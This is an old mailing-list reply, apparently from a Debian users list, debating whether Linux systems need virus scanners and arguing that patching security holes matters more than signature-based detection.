Re: virus killers?
On Saturday 12 October 2002 21:35, Jamin W. Collins wrote:
> On Fri, Oct 11, 2002 at 10:22:08PM -0700, Vineet Kumar wrote:
> > Had my message consisted solely of "Nope." that would have been bad
> > advice. But, in fairness, I did mention that there are other steps to
> > take in order to secure a debian machine, but that a virs scanner isn't
> > necessarily one of them.
> The dismissal of a virus scanner as one of the steps to secure a system
> (Linux based or otherwise) is the bad advice. It's somewhat similar to
> thinking that just because you might happen to live in a
> neighborhood/city with little to no crime that there is no need to lock
> your house when you leave. While this may be true the majority of the
> time, it's silly not to take the extra precaution.
I have to admit that I've had a different view of the whole virus thing. I've
used that view frequently when I rant about how bad windoze is, so if I'm
totally off here, I would be nice to be told so by friends...:
I mean, whatever viruses can exploit to propagate has to be a huge security
hole, right? So, the problem can't really be the virus, but rather the
security hole that the virus is allowed to exploit, and virus scanners
purpose seems mainly to look for signs of exploits of known holes. They have
to be known, otherwise you wouldn't know what to look for. So, instead of
patching the hole, the "get the latest definition"-paradigm tries to identify
exploits of those holes.
I mean, most of the viruses we see are random attacks, with no special
purpose, attacking random machines, and usually making a lot of fuzz about
Imagineably, you could do the same thing as the virus, but silently and more
directed, so that the anti-virus companies that produce definitions never
hear about it and never respond to it, and the victim never notice (and don't
notice e.g. a data theft, and don't notify their definition provider).
So, what role does the definitions play for a well-patched and well maintained
system, other than identifying that something is going on? Are there
unpatchable, intrinsic design flaws that could be exploited by viruses? If
so, what is it that prevents exploits by anybody?
Well, I'm just curious... :-)